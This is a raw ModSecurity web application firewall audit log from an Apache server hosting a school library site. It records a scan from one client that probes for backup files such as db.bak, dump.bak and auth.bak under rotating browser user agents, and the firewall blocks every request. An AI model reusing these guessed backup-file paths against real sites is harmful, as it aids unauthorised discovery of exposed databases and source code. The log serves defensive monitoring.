Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35cb40a-Z-- --33e7792e-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8LwAAAAo 103.236.140.4 55690 103.236.140.4 8181 --33e7792e-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0.1) Gecko/20100101 Firefox/58.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153845766 --33e7792e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --33e7792e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855637616 9611 (- - -) Stopwatch2: 1747543855637616 9611; combined=2604, p1=648, p2=1927, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e7792e-Z-- --5ddb0528-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8NwAAABY 103.236.140.4 55736 103.236.140.4 8181 --5ddb0528-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149579248 --5ddb0528-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5ddb0528-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855643023 6221 (- - -) Stopwatch2: 1747543855643023 6221; combined=1197, p1=422, p2=752, p3=0, p4=0, p5=23, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ddb0528-Z-- --8d20db76-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSgAAAAJU 103.236.140.4 56200 103.236.140.4 8181 --8d20db76-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 OPR/54.0.2952.71 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150798348 --8d20db76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8d20db76-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855650119 2799 (- - -) Stopwatch2: 1747543855650119 2799; combined=1181, p1=788, p2=364, p3=0, p4=0, p5=29, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d20db76-Z-- --7f7e337c-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EgQAAAEg 103.236.140.4 55706 103.236.140.4 8181 --7f7e337c-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70844446 --7f7e337c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7f7e337c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855649521 5992 (- - -) Stopwatch2: 1747543855649521 5992; combined=1008, p1=626, p2=354, p3=0, p4=0, p5=28, sr=212, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f7e337c-Z-- --ba5d3113-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EggAAAEc 103.236.140.4 55712 103.236.140.4 8181 --ba5d3113-B-- GET /2022.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153649158 --ba5d3113-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ba5d3113-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855644519 11243 (- - -) Stopwatch2: 1747543855644519 11243; combined=812, p1=414, p2=362, p3=0, p4=0, p5=35, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba5d3113-Z-- --2f892772-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8OQAAAAw 103.236.140.4 56190 103.236.140.4 8181 --2f892772-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155582467 --2f892772-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2f892772-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855647612 9380 (- - -) Stopwatch2: 1747543855647612 9380; combined=1755, p1=369, p2=1353, p3=0, p4=0, p5=32, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f892772-Z-- --eafac713-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EbAAAAE8 103.236.140.4 55714 103.236.140.4 8181 --eafac713-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155418627 --eafac713-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eafac713-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855641538 18963 (- - -) Stopwatch2: 1747543855641538 18963; combined=3458, p1=2996, p2=332, p3=0, p4=0, p5=130, sr=1582, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eafac713-Z-- --cbdf5f1d-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EhAAAAEg 103.236.140.4 56234 103.236.140.4 8181 --cbdf5f1d-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 148848332 --cbdf5f1d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cbdf5f1d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855655824 5458 (- - -) Stopwatch2: 1747543855655824 5458; combined=1035, p1=473, p2=524, p3=0, p4=0, p5=38, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdf5f1d-Z-- --d6546c01-A-- [18/May/2025:11:50:55 +0700] aClnL1ewLfDrCkDGIGxdqAAAAMA 103.236.140.4 54062 103.236.140.4 8181 --d6546c01-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155385859 --d6546c01-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d6546c01-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855655857 9360 (- - -) Stopwatch2: 1747543855655857 9360; combined=785, p1=395, p2=358, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6546c01-Z-- --56311b22-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EkAAAAE8 103.236.140.4 55666 103.236.140.4 8181 --56311b22-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/55.0.2994.37 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151519244 --56311b22-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --56311b22-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855663918 2274 (- - -) Stopwatch2: 1747543855663918 2274; combined=732, p1=372, p2=333, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56311b22-Z-- --ff69ff5a-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8VgAAAA4 103.236.140.4 55728 103.236.140.4 8181 --ff69ff5a-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118390799 --ff69ff5a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ff69ff5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855652756 17825 (- - -) Stopwatch2: 1747543855652756 17825; combined=782, p1=383, p2=366, p3=0, p4=0, p5=33, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff69ff5a-Z-- --1019de5a-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5ElwAAAEE 103.236.140.4 55700 103.236.140.4 8181 --1019de5a-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 77289120 --1019de5a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1019de5a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855668994 2813 (- - -) Stopwatch2: 1747543855668994 2813; combined=1081, p1=404, p2=642, p3=0, p4=0, p5=34, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1019de5a-Z-- --27a6f479-A-- [18/May/2025:11:50:55 +0700] aClnLxir-GlPrFVVKe5EhgAAAFg 103.236.140.4 56254 103.236.140.4 8181 --27a6f479-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155713539 --27a6f479-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --27a6f479-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855656514 16337 (- - -) Stopwatch2: 1747543855656514 16337; combined=14502, p1=403, p2=14070, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27a6f479-Z-- --1e35094e-A-- [18/May/2025:11:50:55 +0700] aClnL0PRqak7bVuUS6cSkwAAAJM 103.236.140.4 56286 103.236.140.4 8181 --1e35094e-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150142991 --1e35094e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e35094e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855668858 4917 (- - -) Stopwatch2: 1747543855668858 4917; combined=1045, p1=378, p2=559, p3=0, p4=0, p5=108, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e35094e-Z-- --8a38bf05-A-- [18/May/2025:11:50:55 +0700] aClnL_ypzAd0elWOk7o8VQAAABI 103.236.140.4 56314 103.236.140.4 8181 --8a38bf05-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150798351 --8a38bf05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8a38bf05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543855659568 14656 (- - -) Stopwatch2: 1747543855659568 14656; combined=1781, p1=1239, p2=500, p3=0, p4=0, p5=41, sr=427, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a38bf05-Z-- --97ff5955-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5EngAAAFI 103.236.140.4 56240 103.236.140.4 8181 --97ff5955-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:58.0.1) Gecko/20100101 Firefox/58.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150634520 --97ff5955-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --97ff5955-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856233611 3120 (- - -) Stopwatch2: 1747543856233611 3120; combined=1086, p1=680, p2=366, p3=0, p4=0, p5=39, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
